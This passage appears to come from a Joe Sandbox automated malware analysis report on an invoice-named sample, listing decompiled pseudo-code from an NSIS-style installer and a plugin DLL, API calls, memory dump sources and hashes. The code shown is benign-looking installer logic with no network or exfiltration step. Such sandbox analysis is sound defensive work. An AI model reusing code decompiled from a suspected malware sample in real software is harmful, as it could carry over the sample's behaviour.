                                                                                                  						__eflags =  *_t229 - _t284;
                                                                                                  						if( *_t229 == _t284) {
                                                                                                  							goto L161;
                                                                                                  						}
                                                                                                  						_t220 = E10001311(_t229);
                                                                                                  						L144:
                                                                                                  						goto L145;
                                                                                                  					}
                                                                                                  					if(_t228 != 1) {
                                                                                                  						goto L161;
                                                                                                  					}
                                                                                                  					_t80 = _t319 + 8; // 0x8
                                                                                                  					_t285 = _t80;
                                                                                                  					_t314 = E10001311(_t80);
                                                                                                  					 *(_t319 + 0x1008) = _t314;
                                                                                                  					if(_t314 == 0) {
                                                                                                  						goto L160;
                                                                                                  					}
                                                                                                  					 *(_t319 + 0x104c) =  *(_t319 + 0x104c) & 0x00000000;
                                                                                                  					 *((intOrPtr*)(_t319 + 0x1050)) = E1000122C(_t285);
                                                                                                  					 *(_t319 + 0x103c) =  *(_t319 + 0x103c) & 0x00000000;
                                                                                                  					 *((intOrPtr*)(_t319 + 0x1048)) = 1;
                                                                                                  					 *((intOrPtr*)(_t319 + 0x1038)) = 1;
                                                                                                  					_t89 = _t319 + 0x808; // 0x808
                                                                                                  					_t220 =  *(_t314->i + E10001311(_t89) * 4);
                                                                                                  					goto L144;
                                                                                                  				}
                                                                                                  			}
                                                                                                  0x10001cb0
                                                                                                  0x10001cb2
                                                                                                  0x10001cb4
                                                                                                  0x10001cb4
                                                                                                  0x10001cba
                                                                                                  0x10001cc0
                                                                                                  0x10001cc2
                                                                                                  0x10001cd6
                                                                                                  0x10001cd6
                                                                                                  0x10001cd8
                                                                                                  0x10001cc4
                                                                                                  0x10001cca
                                                                                                  0x10001ccd
                                                                                                  0x10001ccd
                                                                                                  0x00000000
                                                                                                  0x10001c5f
                                                                                                  0x10001c5f
                                                                                                  0x10001c5f
                                                                                                  0x10001c60
                                                                                                  0x10001c68
                                                                                                  0x10001c6c
                                                                                                  0x10001c72
                                                                                                  0x10001c76
                                                                                                  0x10001cde
                                                                                                  0x10001ce1
                                                                                                  0x10001ce5
                                                                                                  0x10001d70
                                                                                                  0x10001d74
                                                                                                  0x10001b59
                                                                                                  0x00000000
                                                                                                  0x10001b59
                                                                                                  0x00000000
                                                                                                  0x10001d74
                                                                                                  0x10001c62
                                                                                                  0x10001c62
                                                                                                  0x10001c63
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10001c65
                                                                                                  0x10001c66
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10001c66
                                                                                                  0x10001c5d
                                                                                                  0x10001bf7
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10001c00
                                                                                                  0x10001c03
                                                                                                  0x10001c10
                                                                                                  0x10001c10
                                                                                                  0x10001c05
                                                                                                  0x00000000
                                                                                                  0x10001c05
                                                                                                  0x10001b7a
                                                                                                  0x10001b7d
                                                                                                  0x10001bce
                                                                                                  0x10001bd1
                                                                                                  0x10001be3
                                                                                                  0x10001be3
                                                                                                  0x10001be6
                                                                                                  0x00000000
                                                                                                  0x10001be6
                                                                                                  0x10001bd3
                                                                                                  0x10001bd8
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10001bda
                                                                                                  0x10001bdd
                                                                                                  0x10001ced
                                                                                                  0x10001cf0
                                                                                                  0x10001cf0
                                                                                                  0x10001cf2
                                                                                                  0x10002048
                                                                                                  0x1000204b
                                                                                                  0x100020b2
                                                                                                  0x10001d60
                                                                                                  0x10001d63
                                                                                                  0x10001d66
                                                                                                  0x10001d69
                                                                                                  0x10001d69
                                                                                                  0x10001d6b
                                                                                                  0x10001d6c
                                                                                                  0x10001d6c
                                                                                                  0x10001d6d
                                                                                                  0x00000000
                                                                                                  0x10001d6d
                                                                                                  0x1000204d
                                                                                                  0x10002050
                                                                                                  0x10002057
                                                                                                  0x10002057
                                                                                                  0x1000205b
                                                                                                  0x1000206f
                                                                                                  0x1000206f
                                                                                                  0x10002072
                                                                                                  0x10002076
                                                                                                  0x100020be
                                                                                                  0x100020c1
                                                                                                  0x100020c5
                                                                                                  0x00000000
                                                                                                  0x100020c5
                                                                                                  0x10002078
                                                                                                  0x1000207c
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x1000207e
                                                                                                  0x10002085
                                                                                                  0x10002085
                                                                                                  0x1000208b
                                                                                                  0x1000208e
                                                                                                  0x100020aa
                                                                                                  0x10002090
                                                                                                  0x10002099
                                                                                                  0x1000209c
                                                                                                  0x1000209c
                                                                                                  0x00000000
                                                                                                  0x1000208e
                                                                                                  0x1000205d
                                                                                                  0x10002060
                                                                                                  0x10002064
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10002066
                                                                                                  0x00000000
                                                                                                  0x10002066
                                                                                                  0x10002052
                                                                                                  0x10002055
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10002055
                                                                                                  0x10001cf8
                                                                                                  0x10001cf8
                                                                                                  0x10001cf9
                                                                                                  0x10001e29
                                                                                                  0x10001e29
                                                                                                  0x10001e2e
                                                                                                  0x10001e31
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10001e3e
                                                                                                  0x00000000
                                                                                                  0x10001fe5
                                                                                                  0x10001fe8
                                                                                                  0x10001feb
                                                                                                  0x10001feb
                                                                                                  0x10001fec
                                                                                                  0x10001fed
                                                                                                  0x10001ff0
                                                                                                  0x10001ff3
                                                                                                  0x10001ff6
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10001ff8
                                                                                                  0x10001ff8
                                                                                                  0x10001ffc
                                                                                                  0x10002014
                                                                                                  0x10002017
                                                                                                  0x10002021
                                                                                                  0x00000000
                                                                                                  0x10002021
                                                                                                  0x10001ffe
                                                                                                  0x10001ffe
                                                                                                  0x10002001
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10002003
                                                                                                  0x10002006
                                                                                                  0x10002008
                                                                                                  0x10002009
                                                                                                  0x10002009
                                                                                                  0x10002009
                                                                                                  0x1000200a
                                                                                                  0x1000200d
                                                                                                  0x10002010
                                                                                                  0x10002011
                                                                                                  0x10001feb
                                                                                                  0x10001fec
                                                                                                  0x10001fed
                                                                                                  0x10001ff0
                                                                                                  0x10001ff3
                                                                                                  0x10001ff6
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10001ff6
                                                                                                  0x00000000
                                                                                                  0x10001e85
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10001e91
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10001e78
                                                                                                  0x10001e7c
                                                                                                  0x10001e80
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10001fb6
                                                                                                  0x10001fba
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10001fc0
                                                                                                  0x10001fc9
                                                                                                  0x10001fd0
                                                                                                  0x10001fd8
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10001f53
                                                                                                  0x10001f53
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10001e9a
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10002040
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10002030
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10002034
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x1000203c
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10001f76
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10001f5b
                                                                                                  0x10001f5d
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10001f7e
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10001f63
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10001f67
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10002038
                                                                                                  0x10002042
                                                                                                  0x10002042
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x10001f86
                                                                                                  0x10001f8a
                                                                                                  0x10001f8f
                                                                                                  0x10001f92
                                                                                                  0x10001f93
                                                                                                  0x10001f96
                                                                                                  0x10001f9c
                                                                                                  APIs
                                                                                                    • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                  • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1463432748.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1463396007.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                  • Associated: 00000000.00000002.1463469816.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                  • Associated: 00000000.00000002.1463524699.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$Free$lstrcpy$Alloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 4227406936-0
                                                                                                  • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                                                                  • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                  • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                                                                  • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 67%
                                                                                                  			E004020FE() {
                                                                                                  				signed int _t52;
                                                                                                  				void* _t56;
                                                                                                  				intOrPtr* _t60;
                                                                                                  				intOrPtr _t61;
                                                                                                  				intOrPtr* _t62;
                                                                                                  				intOrPtr* _t64;
                                                                                                  				intOrPtr* _t66;
                                                                                                  				intOrPtr* _t68;
                                                                                                  				intOrPtr* _t70;
                                                                                                  				intOrPtr* _t72;
                                                                                                  				intOrPtr* _t74;
                                                                                                  				intOrPtr* _t76;
                                                                                                  				intOrPtr* _t78;
                                                                                                  				intOrPtr* _t80;
                                                                                                  				void* _t83;
                                                                                                  				intOrPtr* _t91;
                                                                                                  				signed int _t101;
                                                                                                  				signed int _t105;
                                                                                                  				void* _t107;
                                                                                                  
                                                                                                  				 *((intOrPtr*)(_t107 - 0x4c)) = E00402C37(0xfffffff0);
                                                                                                  				 *((intOrPtr*)(_t107 - 0x3c)) = E00402C37(0xffffffdf);
                                                                                                  				 *((intOrPtr*)(_t107 - 8)) = E00402C37(2);
                                                                                                  				 *((intOrPtr*)(_t107 - 0x48)) = E00402C37(0xffffffcd);
                                                                                                  				 *((intOrPtr*)(_t107 - 0xc)) = E00402C37(0x45);
                                                                                                  				_t52 =  *(_t107 - 0x18);
                                                                                                  				 *(_t107 - 0x44) = _t52 & 0x00000fff;
                                                                                                  				_t101 = _t52 & 0x00008000;
                                                                                                  				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                                                                  				 *(_t107 - 0x38) = _t52 >> 0x00000010 & 0x0000ffff;
                                                                                                  				if(E00405BA7( *((intOrPtr*)(_t107 - 0x3c))) == 0) {
                                                                                                  					E00402C37(0x21);
                                                                                                  				}
                                                                                                  				_t56 = _t107 + 8;
                                                                                                  				__imp__CoCreateInstance(0x4084dc, _t83, "true", 0x4084cc, _t56);
                                                                                                  				if(_t56 < _t83) {
                                                                                                  					L14:
                                                                                                  					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                                                                  					_push(0xfffffff0);
                                                                                                  				} else {
                                                                                                  					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                                                                  					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084ec, _t107 - 0x30);
                                                                                                  					 *((intOrPtr*)(_t107 - 0x10)) = _t61;
                                                                                                  					if(_t61 >= _t83) {
                                                                                                  						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                                                                  						 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x3c)));
                                                                                                  						if(_t101 == _t83) {
                                                                                                  							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                                                                  							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated");
                                                                                                  						}
                                                                                                  						if(_t105 != _t83) {
                                                                                                  							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                                                                  							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                                                                  						}
                                                                                                  						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                                                                  						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x38));
                                                                                                  						_t91 =  *((intOrPtr*)(_t107 - 0x48));
                                                                                                  						if( *_t91 != _t83) {
                                                                                                  							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                                                                  							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x44));
                                                                                                  						}
                                                                                                  						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                                                                  						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                                                                  						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                                                                  						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                                                                  						if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
                                                                                                  							_t74 =  *((intOrPtr*)(_t107 - 0x30));
                                                                                                  							 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x4c)), "true");
                                                                                                  						}
                                                                                                  						_t72 =  *((intOrPtr*)(_t107 - 0x30));
                                                                                                  						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                                  					}
                                                                                                  					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                                                                  					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                                                  					if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
                                                                                                  						_push(0xfffffff4);
                                                                                                  					} else {
                                                                                                  						goto L14;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				E00401423();
                                                                                                  				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t107 - 4));
                                                                                                  				return 0;
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated, xrefs: 004021BD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateInstance
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated
                                                                                                  • API String ID: 542301482-3781222300
                                                                                                  • Opcode ID: 75bd8e49128f364a0fc7c4c1a7bdc2d45d81300e390856c6e58ec56fd8bb38af
                                                                                                  • Instruction ID: 12128347f435f69461b39f0114e3e01667000ffa0243525f0bda7dd6f9c1772f
                                                                                                  • Opcode Fuzzy Hash: 75bd8e49128f364a0fc7c4c1a7bdc2d45d81300e390856c6e58ec56fd8bb38af
                                                                                                  • Instruction Fuzzy Hash: BF4139B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 39%
                                                                                                  			E00402862(short __ebx, short* __esi) {
                                                                                                  				void* _t21;
                                                                                                  
                                                                                                  				if(FindFirstFileW(E00402C37(2), _t21 - 0x2d4) != 0xffffffff) {
                                                                                                  					E004061A6( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                                                                  					_push(_t21 - 0x2a8);
                                                                                                  					_push(__esi);
                                                                                                  					E0040625F();
                                                                                                  				} else {
                                                                                                  					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                                                                  					 *__esi = __ebx;
                                                                                                  					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                                                  				}
                                                                                                  				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t21 - 4));
                                                                                                  				return 0;
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFindFirst
                                                                                                  • String ID:
                                                                                                  • API String ID: 1974802433-0
                                                                                                  • Opcode ID: 6634e00a7cf8ae9f81784cc3fd27b444408b2eeaa47297c107ee77c483e0c32a
                                                                                                  • Instruction ID: cb5017da262a82374af33b7b9c4435bd67f431664fd16e1eaa48b990974d77dd
                                                                                                  • Opcode Fuzzy Hash: 6634e00a7cf8ae9f81784cc3fd27b444408b2eeaa47297c107ee77c483e0c32a
                                                                                                  • Instruction Fuzzy Hash: 88F08C71A04104AFDB10EBA4DE49AADB378EF10314F2046BBF501F21D1DBB84E819B2A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 93%
                                                                                                  			E00404391(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                                                                  				intOrPtr _v8;
                                                                                                  				int _v12;
                                                                                                  				void* _v16;
                                                                                                  				struct HWND__* _t56;
                                                                                                  				intOrPtr _t69;
                                                                                                  				signed int _t75;
                                                                                                  				signed short* _t76;
                                                                                                  				signed short* _t78;
                                                                                                  				long _t92;
                                                                                                  				int _t103;
                                                                                                  				signed int _t108;
                                                                                                  				signed int _t110;
                                                                                                  				intOrPtr _t111;
                                                                                                  				intOrPtr _t113;
                                                                                                  				WCHAR* _t114;
                                                                                                  				signed int* _t116;
                                                                                                  				WCHAR* _t117;
                                                                                                  				struct HWND__* _t118;
                                                                                                  
                                                                                                  				if(_a8 != 0x110) {
                                                                                                  					__eflags = _a8 - 0x111;
                                                                                                  					if(_a8 != 0x111) {
                                                                                                  						L13:
                                                                                                  						__eflags = _a8 - 0x4e;
                                                                                                  						if(_a8 != 0x4e) {
                                                                                                  							__eflags = _a8 - 0x40b;
                                                                                                  							if(_a8 == 0x40b) {
                                                                                                  								 *0x79feec =  *0x79feec + 1;
                                                                                                  								__eflags =  *0x79feec;
                                                                                                  							}
                                                                                                  							L27:
                                                                                                  							_t114 = _a16;
                                                                                                  							L28:
                                                                                                  							return E0040425B(_a8, _a12, _t114);
                                                                                                  						}
                                                                                                  						_t56 = GetDlgItem(_a4, 0x3e8);
                                                                                                  						_t114 = _a16;
                                                                                                  						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x70b;
                                                                                                  						if( *((intOrPtr*)(_t114 + 8)) == 0x70b) {
                                                                                                  							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x201;
                                                                                                  							if( *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                                                                  								_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                                                                  								_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                                                                  								_v12 = _t103;
                                                                                                  								__eflags = _t103 - _t113 - 0x800;
                                                                                                  								_v16 = _t113;
                                                                                                  								_v8 = 0x7a69c0;
                                                                                                  								if(_t103 - _t113 < 0x800) {
                                                                                                  									SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                                                                  									SetCursor(LoadCursorW(0, 0x7f02));
                                                                                                  									_push("true");
                                                                                                  									E00404640(_a4, _v8);
                                                                                                  									SetCursor(LoadCursorW(0, 0x7f00));
                                                                                                  									_t114 = _a16;
                                                                                                  								}
                                                                                                  							}
                                                                                                  						}
                                                                                                  						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x700;
                                                                                                  						if( *((intOrPtr*)(_t114 + 8)) != 0x700) {
                                                                                                  							goto L28;
                                                                                                  						} else {
                                                                                                  							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x100;
                                                                                                  							if( *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                                                                  								goto L28;
                                                                                                  							}
                                                                                                  							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0xd;
                                                                                                  							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                                                                  								SendMessageW( *0x7a8a28, 0x111, "true", 0);
                                                                                                  							}
                                                                                                  							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0x1b;
                                                                                                  							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                                                                  								SendMessageW( *0x7a8a28, 0x10, 0, 0);
                                                                                                  							}
                                                                                                  							return 1;
                                                                                                  						}
                                                                                                  					}
                                                                                                  					__eflags = _a12 >> 0x10;
                                                                                                  					if(_a12 >> 0x10 != 0) {
                                                                                                  						goto L27;
                                                                                                  					}
                                                                                                  					__eflags =  *0x79feec; // 0x0
                                                                                                  					if(__eflags != 0) {
                                                                                                  						goto L27;
                                                                                                  					}
                                                                                                  					_t69 =  *0x7a0ef8; // 0xb7d614
                                                                                                  					_t29 = _t69 + 0x14; // 0xb7d628
                                                                                                  					_t116 = _t29;
                                                                                                  					__eflags =  *_t116 & 0x00000020;
                                                                                                  					if(( *_t116 & 0x00000020) == 0) {
                                                                                                  						goto L27;
                                                                                                  					}
                                                                                                  					_t108 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                                  					__eflags = _t108;
                                                                                                  					 *_t116 = _t108;
                                                                                                  					E00404216(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                                  					E0040461C();
                                                                                                  					goto L13;
                                                                                                  				} else {
                                                                                                  					_t117 = _a16;
                                                                                                  					_t75 =  *(_t117 + 0x30);
                                                                                                  					if(_t75 < 0) {
                                                                                                  						_t111 =  *0x7a79fc; // 0xb8007e
                                                                                                  						_t75 =  *(_t111 - 4 + _t75 * 4);
                                                                                                  					}
                                                                                                  					_t76 =  *0x7a8a78 + _t75 * 2;
                                                                                                  					_t110 =  *_t76 & 0x0000ffff;
                                                                                                  					_a8 = _t110;
                                                                                                  					_t78 =  &(_t76[1]);
                                                                                                  					_a16 = _t78;
                                                                                                  					_v16 = _t78;
                                                                                                  					_v12 = 0;
                                                                                                  					_v8 = E00404342;
                                                                                                  					if(_t110 != 2) {
                                                                                                  						_v8 = E00404308;
                                                                                                  					}
                                                                                                  					_push( *((intOrPtr*)(_t117 + 0x34)));
                                                                                                  					_push(0x22);
                                                                                                  					E004041F4(_a4);
                                                                                                  					_push( *((intOrPtr*)(_t117 + 0x38)));
                                                                                                  					_push(0x23);
                                                                                                  					E004041F4(_a4);
                                                                                                  					CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, "true");
                                                                                                  					E00404216( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                                                                  					_t118 = GetDlgItem(_a4, 0x3e8);
                                                                                                  					E00404229(_t118);
                                                                                                  					SendMessageW(_t118, 0x45b, "true", 0);
                                                                                                  					_t92 =  *( *0x7a8a34 + 0x68);
                                                                                                  					if(_t92 < 0) {
                                                                                                  						_t92 = GetSysColor( ~_t92);
                                                                                                  					}
                                                                                                  					SendMessageW(_t118, 0x443, 0, _t92);
                                                                                                  					SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                                                                  					SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                                                                  					 *0x79feec = 0;
                                                                                                  					SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                                                                  					 *0x79feec = 0;
                                                                                                  					return 0;
                                                                                                  				}
                                                                                                  			}





















                                                                                                  0x004043d8
                                                                                                  0x004043db
                                                                                                  0x004043de
                                                                                                  0x004043e1
                                                                                                  0x004043e8
                                                                                                  0x004043ea
                                                                                                  0x004043ea
                                                                                                  0x004043f4
                                                                                                  0x00404401
                                                                                                  0x0040440b
                                                                                                  0x00404410
                                                                                                  0x00404413
                                                                                                  0x00404418
                                                                                                  0x0040442f
                                                                                                  0x00404436
                                                                                                  0x00404449
                                                                                                  0x0040444c
                                                                                                  0x00404460
                                                                                                  0x00404467
                                                                                                  0x0040446c
                                                                                                  0x00404471
                                                                                                  0x00404471
                                                                                                  0x0040447f
                                                                                                  0x0040448d
                                                                                                  0x0040449f
                                                                                                  0x004044a4
                                                                                                  0x004044b4
                                                                                                  0x004044b6
                                                                                                  0x00000000
                                                                                                  0x004044bc

                                                                                                  APIs
                                                                                                  • CheckDlgButton.USER32(?,-0000040A,?), ref: 0040442F
                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404443
                                                                                                  • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404460
                                                                                                  • GetSysColor.USER32(?), ref: 00404471
                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040447F
                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040448D
                                                                                                  • lstrlenW.KERNEL32(?), ref: 00404492
                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040449F
                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044B4
                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040450D
                                                                                                  • SendMessageW.USER32(00000000), ref: 00404514
                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040453F
                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404582
                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00404590
                                                                                                  • SetCursor.USER32(00000000), ref: 00404593
                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004045AC
                                                                                                  • SetCursor.USER32(00000000), ref: 004045AF
                                                                                                  • SendMessageW.USER32(00000111,?,00000000), ref: 004045DE
                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 004045F0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
